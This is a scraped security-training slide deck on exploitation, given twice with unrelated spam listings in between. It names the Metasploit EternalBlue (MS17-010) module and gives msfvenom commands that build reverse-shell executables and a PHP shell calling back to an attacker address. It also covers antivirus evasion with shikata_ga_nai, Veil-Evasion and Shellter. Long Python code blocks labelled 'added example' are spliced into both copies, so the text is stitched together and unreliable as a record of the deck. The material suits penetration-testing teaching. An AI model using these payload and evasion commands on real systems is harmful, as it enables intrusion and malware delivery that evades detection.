www.prismacsi.com
© All Rights Reserved.
1
Practical White Hat Hacker Training #5
Exploitation
This document may be quoted or shared, but cannot be modified or used for commercial purposes.
For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
Exploit Stage Topics
• What is an exploit?
• Types of exploits
• Local, remote and 0day exploits
• Exploit Databases
• Example Exploit Scenarios
• Exploit Execution and Usage Scenarios
• Exploit Frameworks
• Payload Concept
• Metasploit Framework
• Antivirus Evasion Software
• Veil-Evasion
• Shellter
• Applications
Basic Concepts
• What’s an exploit?
• The name given to tools developed to exploit a vulnerability.
• Also called exploitation code.
• Local Exploit
• Remote Exploit
• Web Exploit
• DoS Exploit
• 0day Exploit
• What’s a Payload?
• A piece of code delivered by an exploit that performs the desired action once the vulnerability has been triggered.
Exploit Databases
• A holding container for a massive number of exploits. Exploits for discovered/detected software and services can be searched for in these databases.
• Exploit-db.com
• Securityfocus.com
• 0day.today
• Exploits.shodan.io
• Iedb.ir
• Cxsecurity.com/exploit
• Rapid7.com/db
Exploit Development Languages
• In which programming languages are exploits generally written?
• Python
• C / C++
• Perl
• PHP
• Ruby
• Why was the Framework concept conceived?
• Metasploit Framework example
Exploit Execution / Use – Demo
Exploit Editing
• Exploits don’t work on every system.
• Parameters may vary according to features such as operating system, processor architecture and system language.
• In this case you may need to edit the exploit before executing it.
• Replicas of the target system can be created in a laboratory environment for experiments.
• Assume you only have one chance to attack!
• A system crash may be the end of everything.
Exploit Example - Scenario
• Consider a bank’s credit calculation page!
• Where is the calculation performed? (Server? Client?)
• What if we send the request described in the scenario thousands of times within a minute?
• This is an example of a simple DoS exploit :)
Exploit Frameworks
• Metasploit Community
• Metasploit Pro
• Core Impact
• Exploithub
• BeEF
Metasploit Framework
• Metasploit Framework
• Installation
• Basic Commands
• Auxiliary modules
• Exploit use
• Payload list and Meterpreter use
• Output analysis
• Post Exploitation
Metasploit Framework
• It’s open source software.
• A Pro version is available, but the community version will be sufficient for this course.
• Exploits
• Payloads
• Auxiliary modules
• Encoders
• Post exploits
Metasploit Framework
• Visit the link below for installation instructions:
• https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
• Update:
• msfupdate
Metasploit Framework
Metasploit Framework
• Start
• Begin by typing msfconsole in the command line.
• You can check the database status with the following command:
• db_status
Metasploit Framework
• Workspace concept
• Use the workspace command to list all the available workspaces.
• workspace -a prisma
creates a prisma workspace.
• workspace prisma
switches to the prisma workspace.
• workspace -d prisma
deletes the prisma workspace.
Metasploit Framework
Metasploit Framework
• Working with Nessus and Nmap outputs
You can use the output of scanning software in integration with Metasploit. This is one of the best features of the Metasploit Framework.
• db_import nmap.xml
imports Nmap output.
• db_import nessus-report.nessus
imports Nessus output.
• db_export -f xml /tmp/prisma.xml
exports the data in your workspace.
Metasploit Framework
Metasploit Framework
Metasploit Framework
• Workspace data:
• hosts
• services
• creds
• loot
Metasploit Framework
• Hosts command
• db_nmap -sS -Pn -n 10.0.1.0/24
You can perform Nmap scans with this command. The hosts command can then be used to view all IP addresses discovered by the scan.
• hosts -h
You can access all the hosts command functions with the above command.
• hosts -R
Used to add the listed addresses to the RHOSTS parameter.
Metasploit Framework
Metasploit Framework
• Services command
• db_nmap -sS -Pn -n 10.0.1.0/24 -sV
Used to execute an Nmap scan with service version detection. After this command completes, you can view the ports on all IP addresses and the services running on them with the services command.
• services -h
You can access all the services command functions with the above command.
• services -p 445
Lists only the services on port 445.
• services -S http
Lists only the services matching http.
• services -p 80 -R
Adds the hosts that have a service on port 80 to the RHOSTS parameter.
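To make the workspace data behind db_import, hosts and services concrete, here is an added example (not code from the slides or from Metasploit itself) that parses an Nmap XML report the way `nmap -oX` writes it and answers the same questions as `hosts`, `services -p`, `services -S` and `-R`. The XML is a constructed sample, and the substring matching used for `-S` is an assumption about the real command, not a description of it.

```python
"""Added example: a small model of what db_import / hosts / services do with an
Nmap XML report. SAMPLE_NMAP_XML is constructed, not a real scan."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the shape `nmap -oX` writes (two hosts, four ports).
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -sS -Pn -n -sV 10.0.1.0/24">
  <host><status state="up"/><address addr="10.0.1.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Windows 7 microsoft-ds"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Microsoft IIS httpd" version="7.5"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.0.1.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/>
        <service name="http-proxy"/></port>
    </ports></host>
</nmaprun>
"""


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    info: str


class Workspace:
    """Holds what db_import stores for a workspace: one row per host/port."""

    def __init__(self) -> None:
        self.services: List[Service] = []

    def db_import(self, xml_text: str) -> int:
        """Parse an Nmap XML report; return the number of service rows added."""
        root = ET.fromstring(xml_text)
        added = 0
        for host in root.iter("host"):
            addr = host.find("address[@addrtype='ipv4']")
            if addr is None:
                continue
            ip = addr.get("addr")
            for port in host.iter("port"):
                state_el = port.find("state")
                svc = port.find("service")
                state = state_el.get("state", "") if state_el is not None else ""
                name = svc.get("name", "") if svc is not None else ""
                info = ""
                if svc is not None:
                    info = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
                self.services.append(
                    Service(ip, int(port.get("portid")), port.get("protocol", "tcp"), state, name, info)
                )
                added += 1
        return added

    def hosts(self) -> List[str]:
        """Like `hosts`: distinct addresses in import order."""
        return list(dict.fromkeys(s.host for s in self.services))

    def services_cmd(self, port: Optional[int] = None, search: Optional[str] = None,
                     up_only: bool = False) -> List[Service]:
        """Like `services -p PORT` / `services -S TERM`; up_only mimics -u.
        Substring matching on name and info is an assumption, not the real command."""
        out = []
        for s in self.services:
            if up_only and s.state != "open":
                continue
            if port is not None and s.port != port:
                continue
            if search is not None and search not in f"{s.name} {s.info}":
                continue
            out.append(s)
        return out

    def rhosts(self, port: Optional[int] = None, search: Optional[str] = None) -> str:
        """Like the -R flag: the RHOSTS value the filtered hosts would set."""
        return " ".join(dict.fromkeys(s.host for s in self.services_cmd(port, search)))


if __name__ == "__main__":
    ws = Workspace()
    print("imported", ws.db_import(SAMPLE_NMAP_XML), "service rows")
    print("hosts:", ws.hosts())
    print("services -p 445:", ws.services_cmd(port=445))
    print("services -p 80 -R ->", ws.rhosts(port=80))
```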
Metasploit Framework
Metasploit Basic Command List
• help
• Help command
• banner
• Allows you to take awesome screenshots :)
• info
• Get information on any plugin
• info exploit/windows/smb/psexec
• search
• Search command
• search ms17-010
Metasploit Basic Command List
• use
• Select an exploit
• use exploit/windows/smb/psexec
• set
• exploit
• info
• Acquire information on any plugin
• info exploit/windows/smb/psexec
• search
• Search command
• search ms17-010
Metasploit Framework - Help
Metasploit Framework - Banner
Metasploit Framework - Info
Metasploit Basic Command List
• set
• Used to assign values to a parameter.
• set RHOST 10.0.1.5
• setg
• Used to assign a parameter value as global.
• unset
• Used to reset parameter values.
• show
• Lists items (payloads, options, etc.) :)
• use
• Activates a plugin.
Metasploit Basic Command List
• run and exploit
• Used to run a plugin.
• load and unload
• Used to activate or deactivate a module.
• exit
• Exits the console.
Metasploit Show Command
• show payloads
• List Payloads
• show targets
• List the target operating systems/versions supported by the selected plugin
• show options
• Show the configurable parameters of a plugin
• show encoders
• List all encoders
Auxiliary Modules and Use
• show auxiliary
• search smb_login
• use auxiliary/dos/windows/rdp/ms12_020
• set RHOST
• set RPORT
• run
Exploit Attempt (MS17-010)
• search netapi
• info exploit/windows/smb/ms17_010_eternalblue
• use exploit/windows/smb/ms17_010_eternalblue
• show options
• set payload windows/meterpreter/bind_tcp
• set LHOST
• set RHOST
• set RPORT
• exploit
Payload Examples
• set PAYLOAD windows/meterpreter/reverse_http
• set PAYLOAD windows/shell/bind_tcp
• set PAYLOAD linux/x86/meterpreter/reverse_https
• set PAYLOAD php/meterpreter/bind_tcp
• set PAYLOAD java/meterpreter/bind_tcp
• set PAYLOAD windows/vncinject/reverse_tcp
Reverse/Bind Shell
Session Management
• exploit/multi/handler
• Can be used as a listener.
• The listener can be run as a job to receive connections from multiple targets.
• jobs:
• exploit -j
• The jobs command is used for listing jobs.
Session Management
• You can manage all sessions obtained with the sessions command.
• sessions -l : list sessions
• sessions -i 1 : interact with session 1
• sessions -K : end all sessions
• sessions -u : upgrade a shell session to a Meterpreter session
• kill : used to kill a session.
• background : sends the session to the background and returns to the Metasploit console.
Exploit Search
• Searchsploit
What’s Msfvenom?
• There may be no directly exploitable vulnerability in the target system.
• In this case, it may be necessary to try to penetrate the system in different ways.
• For example, if a crafted malicious .exe file is somehow uploaded to and executed on a system, then the system can be captured.
• Or you might want to upload a malicious shell written in PHP to a web application with a file upload vulnerability and get a terminal connection in Metasploit.
• That's where msfvenom comes into play!
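The file-upload vector just described is one a defender can close on the server side. The following is an added example (not code from the slides) of the checks an upload handler can apply so that a PHP payload like the exp.php generated later in this deck is refused rather than stored where it could execute; the file names, byte strings and size limit are constructed for illustration.

```python
"""Added example: server-side validation of image uploads so that a PHP shell
(for example an msfvenom php/meterpreter payload) cannot be stored as an
"image". All sample files here are constructed."""
import os
import secrets
from typing import Tuple

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
# Leading bytes each accepted image type must start with.
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}
# Markers of server-side code hidden inside an otherwise valid image.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")
MAX_BYTES = 5 * 1024 * 1024  # constructed limit for the example


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Every check is on what was actually received,
    never on the Content-Type or file name the client claims."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    # shell.php.jpg style double extensions are refused outright, because some
    # servers choose the handler from the first extension they recognise.
    if len(parts) != 2 or not parts[0]:
        return False, "expected exactly one extension"
    ext = "." + parts[1]
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext} not allowed"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker inside file"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Name to store under: a random id plus the validated extension, so the
    client never chooses the path or the extension on disk."""
    ext = "." + filename.lower().rsplit(".", 1)[-1]
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    samples = {
        "exp.php": b"<?php /* constructed stand-in for a PHP payload */ ?>",
        "shell.php.jpg": b"\xff\xd8\xff\xe0<?php ?>",
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
        "logo.png": b"\x89PNG\r\n\x1a\n<?php ?>",
    }
    for name, body in samples.items():
        ok, why = check_upload(name, body)
        print(f"{name:15} -> {'accept' if ok else 'reject'}: {why}")
```

Accepted files still belong in a directory the web server serves as static content only, with script execution disabled, so a check that is bypassed does not turn into code execution.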
Msfvenom Use
• Msfvenom basic commands
• msfvenom -h
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -f exe > shell.exe
• msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f raw > exp.php
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
Msfvenom AV Evasion- Demonstration
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
Msfvenom Help
Msfvenom PHP Payload Contents
Downloading Additional Metasploit Plugins
• https://github.com/darkoperator/Metasploit-Plugins
Loading Metasploit Plugins
• Plugin files are added manually under ~/.msf4/plugins/
Armitage Use
• A GUI for the Metasploit Framework
• Used to perform actions quickly
• The interface is a little easier to use than the console application
Armitage Use
• Adding a host
Armitage Use
• Host scanning
Armitage Use
• Scan Results
Armitage Use
• Finding an attack vector
Armitage Use
• Java_rmi_attack
Armitage Use
• Java_rmi_attack
• Meterpreter session
Antivirus Evasion Tools
• An antivirus mechanism may be present on target systems.
• In this case the attacks should be performed with much more caution.
• There are tools developed to bypass antiviruses.
• Commonly used tools
• Veil-Evasion
• Shellter
• Av0id
• Msfvenom
Veil-Evasion Installation
Veil-Evasion Payload Selection
Veil-Evasion Payload Configuration
Veil-Evasion Payload Creation - DEMO
Virustotal Scanning
Shellter Installation
Shellter Use – DEMO
Virustotal Scanning
Applications
Questions?
Contacts
• www.prismacsi.com
• info@prismacsi.com
• 0 850 303 85 35
• /prismacsi
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdfEnzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
 
Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology  ( Production , Purification , and Application  ) Hybridoma Technology  ( Production , Purification , and Application  )
Hybridoma Technology ( Production , Purification , and Application )
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK  LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK  LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptx
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
 
Staff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSDStaff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSD
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri  Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Bikash Puri  Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
 

Practical White Hat Hacker Training - Exploitation

1. Practical White Hat Hacker Training #5: Exploitation (www.prismacsi.com, © All Rights Reserved)
This document may be quoted or shared, but cannot be modified or used for commercial purposes. For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr

2. Exploit Stage Topics
• What is an exploit?
• Types of exploits
• Local, remote and 0day exploits
• Exploit Databases
• Example Exploit Scenarios
• Exploit Execution and Usage Scenarios
• Exploit Frameworks
• Payload Concept
• Metasploit Framework
• Antivirus Evasion Software
• Veil-Evasion
• Shellter
• Application

3. Basic Concepts
• What’s an exploit?
  • The name given to tools developed to exploit a vulnerability.
  • Also called exploitation code.
• Local Exploit
• Remote Exploit
• Web Exploit
• DoS Exploit
• 0day Exploit
• What’s a Payload?
  • A piece of malicious code that performs a given desired action after an exploit

4. Exploit Databases
• A holding container for a massive number of exploits. Discovered/detected software and service exploits can be searched for in these databases.
• Exploit-db.com
• Securityfocus.com
• 0day.today
• Exploits.shodan.io
• Iedb.ir
• Cxsecurity.com/exploit
• Rapid7.com/db

5. Exploit Development Languages
• In which programming languages are exploits generally written?
  • Python
  • C / C++
  • Perl
  • PHP
  • Ruby
• Why was the Framework concept conceived?
• Metasploit Framework example

6. Exploit Execution / Use – Demo

7. Exploit Editing
• Exploits don’t execute on every system.
• Parameters may vary according to features such as operating system, processor architecture, system language.
• In this case you may need to edit the exploit and then execute it afterwards.
• Replicas of the target system can be created in a laboratory environment for experiments.
• Assume you only have one chance to attack!
• A system crash may be the end of everything.

8. Exploit Example - Scenario
• Consider a bank’s credit calculation area!
• Where is the calculation performed? (Server? Client?)
• What if we perform the request specified in the scenario thousands of times within a minute?
• This is an example of a simple DoS Exploit
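The scenario on slide 8 (one client sending the credit-calculation request thousands of times within a minute) is easiest to catch on the server side by counting requests per client over a sliding window. The following is an added example written for this section, not code from the training deck. It assumes an Apache combined-format access log whose lines are in chronological order; the path /credit/calculate, the client addresses, the threshold and the log lines themselves are constructed placeholders.

```python
"""Rate-based detection of the request flood in the credit-calculation scenario.

Added example for this section; it is not code from the training deck. It
assumes a server-side access log in Apache combined-log form and that log
lines arrive in chronological order (sort them first if they do not). The
path /credit/calculate, the client addresses and the threshold are all
constructed placeholders.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Combined-log-format prefix: client, identd, user, [timestamp], "request", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_floods(lines, path, threshold, window=timedelta(minutes=1)):
    """Return {client_ip: peak requests to `path` inside any `window`}
    for every client whose peak exceeds `threshold`.

    A per-client sliding window (deque of timestamps) keeps only the
    requests newer than `window`, so memory is bounded by the request
    rate rather than by the size of the log.
    """
    recent = defaultdict(deque)
    peak = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] >= window:
            q.popleft()                      # drop requests older than the window
        peak[rec["ip"]] = max(peak[rec["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n > threshold}


def make_sample_log():
    """Constructed log: one normal client, one client firing 1200 POSTs in 40 s."""
    base = datetime(2024, 3, 12, 10, 0, 0, tzinfo=timezone.utc)
    events = []
    for i in range(6):                       # legitimate: one request every 20 s
        events.append((base + timedelta(seconds=20 * i), "10.0.1.20", "/credit/calculate"))
    events.append((base + timedelta(seconds=5), "10.0.1.20", "/index.html"))
    for i in range(1200):                    # flood: 30 requests per second
        events.append((base + timedelta(seconds=i // 30), "10.0.1.99", "/credit/calculate"))
    events.sort(key=lambda e: e[0])          # keep the log chronological
    return [
        f'{ip} - - [{ts.strftime(TS_FMT)}] "POST {path} HTTP/1.1" 200 512'
        for ts, ip, path in events
    ]


if __name__ == "__main__":
    for ip, n in detect_floods(make_sample_log(), "/credit/calculate", threshold=300).items():
        print(f"ALERT {ip}: {n} requests to /credit/calculate within one minute")
```

The threshold is the part that needs tuning per application: set it from the observed legitimate peak for that endpoint, and pair the alert with rate limiting on the calculation endpoint so that the server, not the client, decides how often the expensive computation runs.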
9. Exploit Frameworks
• Metasploit Community
• Metasploit Pro
• Core Impact
• Exploithub
• BeEF

10. Metasploit Framework
• Metasploit Framework
• Installation
• Basic Commands
• Auxiliary modules
• Exploit use
• Payload list and Meterpreter use
• Output analysis
• Post Exploitation

11. Metasploit Framework
• It’s an open source software.
• A Pro version is available, but the community version will be sufficient for this course.
• Exploits
• Payloads
• Auxiliary modules
• Encoders
• Post exploits

12. Metasploit Framework
• Visit the link below for installation instructions:
  • https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
• Update:
  • msfupdate

13. Metasploit Framework

14. Metasploit Framework
• Start
  • Begin by typing msfconsole in the command line.
  • You can check the database status with the following command:
  • db_status

15. Metasploit Framework
• Workspace concept
  • workspace lists all the available workspaces.
  • workspace -a prisma creates a workspace named prisma.
  • workspace prisma switches to the prisma workspace.
  • workspace -d prisma deletes the prisma workspace.

16. Metasploit Framework

17. Metasploit Framework
• Working with Nessus and Nmap outputs: you can use the output of scanning software in integration with Metasploit. This is one of the best features of the Metasploit Framework.
  • db_import nmap.xml imports Nmap output.
  • db_import nessus-report.nessus imports Nessus output.
  • db_export -f xml /tmp/prisma.xml exports the data in your workspace.

18. Metasploit Framework

19. Metasploit Framework

20. Metasploit Framework
• Workspace data:
  • hosts
  • services
  • creds
  • loots

21. Metasploit Framework
• Hosts command
  • db_nmap -sS -Pn -n 10.0.1.0/24 runs an Nmap scan from within Metasploit. The hosts command can then be used to view all IP addresses discovered from the output of this scan.
  • hosts -h shows all the options of the hosts command.
  • hosts -R adds the listed addresses to the RHOST parameter.

22. Metasploit Framework

23. Metasploit Framework
• Services command
  • db_nmap -sS -Pn -n 10.0.1.0/24 -sV runs an Nmap scan with service detection. After this command completes, you can view the ports on all IP addresses and the services running on them with the services command.
  • services -h shows all the options of the services command.
  • services -p 445
  • services -S http
  • services -p 80 -R
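Slides 17, 21 and 23 describe importing Nmap XML into the workspace and then filtering the stored services by port (services -p), by name (services -S) and collapsing the result to host addresses (-R). The block below is an added example written for this section, not Metasploit's own importer: it parses a constructed, trimmed Nmap XML report into host and service records and implements those three filters over them, so the reader can see what the workspace actually holds after db_import. The addresses, port states and product banners in the sample XML are placeholders, and the filters assume (as an added simplification) that only open ports are of interest.

```python
"""Parsing Nmap XML into host/service records, the way db_import feeds the
workspace, with filters that mirror `services -p`, `services -S` and `-R`.
Added example for this section, not Metasploit's own code. The XML below is
a constructed, trimmed Nmap report; addresses and banners are placeholders.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -Pn -n 10.0.1.0/24">
  <host>
    <status state="up"/>
    <address addr="10.0.1.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Windows SMB"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/>
        <service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.0.1.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="22"><state state="closed"/>
        <service name="ssh"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.0.1.9" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    name: str
    product: str
    state: str


def import_nmap(xml_text):
    """Return (hosts, services) for every host the report marks as up."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for h in root.findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue                      # down hosts never reach the workspace
        addr = h.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        hosts.append(ip)
        for p in h.findall("./ports/port"):
            svc = p.find("service")       # absent when -sV was not used
            services.append(Service(
                host=ip,
                port=int(p.get("portid")),
                proto=p.get("protocol"),
                name=svc.get("name", "") if svc is not None else "",
                product=svc.get("product", "") if svc is not None else "",
                state=p.find("state").get("state"),
            ))
    return hosts, services


def services_by_port(services, port):
    """Like `services -p <port>`: open services on that port (assumed filter)."""
    return [s for s in services if s.port == port and s.state == "open"]


def services_by_name(services, needle):
    """Like `services -S <pattern>`: open services whose name contains needle."""
    return [s for s in services if needle in s.name and s.state == "open"]


def rhosts(services):
    """Like `-R`: the distinct host addresses behind a filtered service list."""
    return sorted({s.host for s in services})


if __name__ == "__main__":
    hosts, svcs = import_nmap(SAMPLE_NMAP_XML)
    print("hosts:", hosts)
    print("services -p 445 -R ->", rhosts(services_by_port(svcs, 445)))
    print("services -S http   ->", [(s.host, s.port, s.product) for s in services_by_name(svcs, "http")])
```

Two details matter for reading your own scan data: hosts reported as down and ports reported as closed or filtered are still present in the XML, so any filter has to look at the state attributes rather than at the mere presence of a port element, and the service element only carries a name and product when the scan was run with -sV.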
24. Metasploit Framework

25. Metasploit Basic Command List
• help
  • Help command
• banner
  • Allows you to take awesome screenshots
• info
  • Get information on any plugin
  • info exploit/windows/smb/psexec
• search
  • Search command
  • search ms17-010

26. Metasploit Basic Command List
• use
  • Select an exploit
  • use exploit/windows/smb/psexec
• set
  • Exploit
• info
  • Acquire information on any plugin
  • info exploit/windows/smb/psexec
• search
  • Search command
  • search ms17-010

27. Metasploit Framework - Help

28. Metasploit Framework - Banner

29. Metasploit Framework - Info

30. Metasploit Basic Command List
• set
  • Used to assign values to a parameter.
  • set RHOST 10.0.1.5
• setg
  • Used to assign a parameter value as global.
• unset
  • Used to reset parameter values.
• show
  • Show names
• use
  • Activates a plugin.

31. Metasploit Basic Command List
• run and exploit
  • Used to run a plugin.
• load and unload
  • Used to activate or deactivate a module.
• exit
  • Exit command

32. Metasploit Show Command
• show payloads
  • List payloads
• show targets
  • List operating systems suitable for attacks with a given plugin
• show options
  • Show the setting parameters for a plugin
• show encoders
  • List all encoders

33. Auxiliary Modules and Use
• show auxiliary
• search smb_login
• use auxiliary/dos/windows/rdp/ms12_020
• set RHOST
• set RPORT
• run

34. Exploit Attempt (MS17-010)
• search netapi
• info exploit/windows/smb/ms17_010_eternalblue
• use exploit/windows/smb/ms17_010_eternalblue
• show options
• set payload windows/meterpreter/bind_tcp
• set LHOST
• set RHOST
• set RPORT
• exploit

35. Payload Examples
• set PAYLOAD windows/meterpreter/reverse_http
• set PAYLOAD windows/shell/bind_tcp
• set PAYLOAD linux/x86/meterpreter/reverse_https
• set PAYLOAD php/meterpreter/bind_tcp
• set PAYLOAD java/meterpreter/bind_tcp
• set PAYLOAD windows/vncinject/reverse_tcp

36. Reverse/Bind Shell

37. Session Management
• exploit/multi/handler
  • Can be used as a listener.
  • The listener can be run as a job to receive connections from multiple targets.
• jobs:
  • exploit -j
  • The jobs command is used for listing jobs.

38. Session Management
• You can manage all sessions obtained with the sessions command.
  • sessions -l: list sessions
  • sessions -i 1: interact with session 1
  • sessions -K: end all sessions
  • sessions -u: upgrade a session to a Meterpreter session
  • kill: used to kill a session.
  • background: sends the session to the background and returns to the Metasploit console.

39. Exploit Search
• Searchsploit

40. What’s Msfvenom?
• There may be no direct vulnerability in the target system.
• In this case, it may be necessary to try to penetrate the system in different ways.
• For example, if a created malicious .exe file is somehow successfully uploaded and executed on a system, then the system can be captured.
• Or you might want to upload a malicious shell written in PHP to a web application with a file upload vulnerability and get a terminal connection in Metasploit.
• That's where msfvenom comes into play!

41. Msfvenom Use
• Msfvenom basic commands
  • msfvenom -h
  • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -f exe > shell.exe
  • msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f raw > exp.php
  • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86

42. Msfvenom AV Evasion - Demonstration
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe

43. Msfvenom Help

44. Msfvenom PHP Payload Contents

45. Download Metasploit Additional Plugins
• https://github.com/darkoperator/Metasploit-Plugins

46. Loading Metasploit Features
• Plugin files are added manually under ~/.msf4/plugins/

47. Armitage Use
• Metasploit Framework GUI
• Used to perform actions quickly
• The interface is a little easier to use compared to the console application

48. Armitage Use
• Adding a host

49. Armitage Use
• Host scanning

50. Armitage Use
• Scan results

51. Armitage Use
• Finding an attack vector

52. Armitage Use
• Java_rmi_attack

53. Armitage Use
• Java_rmi_attack
• Meterpreter session

54. Antivirus Evasion Tools
• An antivirus mechanism may be present on target systems.
• In this case the attacks should be performed with much more caution.
• There are tools developed to bypass antiviruses.
• Tools used:
  • Veil-Evasion
  • Shellter
  • Av0id
  • Msfvenom

55. Veil-Evasion Installation

56. Veil-Evasion Payload Selection

57. Veil-Evasion Payload Configuration

58. Veil-Evasion Payload Creation - DEMO

59. Virustotal Scanning

60. Shellter Installation

61. Shellter Use – DEMO

62. Virustotal Scanning

63. Applications

64. Questions?

65. Contacts
• www.prismacsi.com
• info@prismacsi.com
• 0 850 303 85 35
• /prismacsi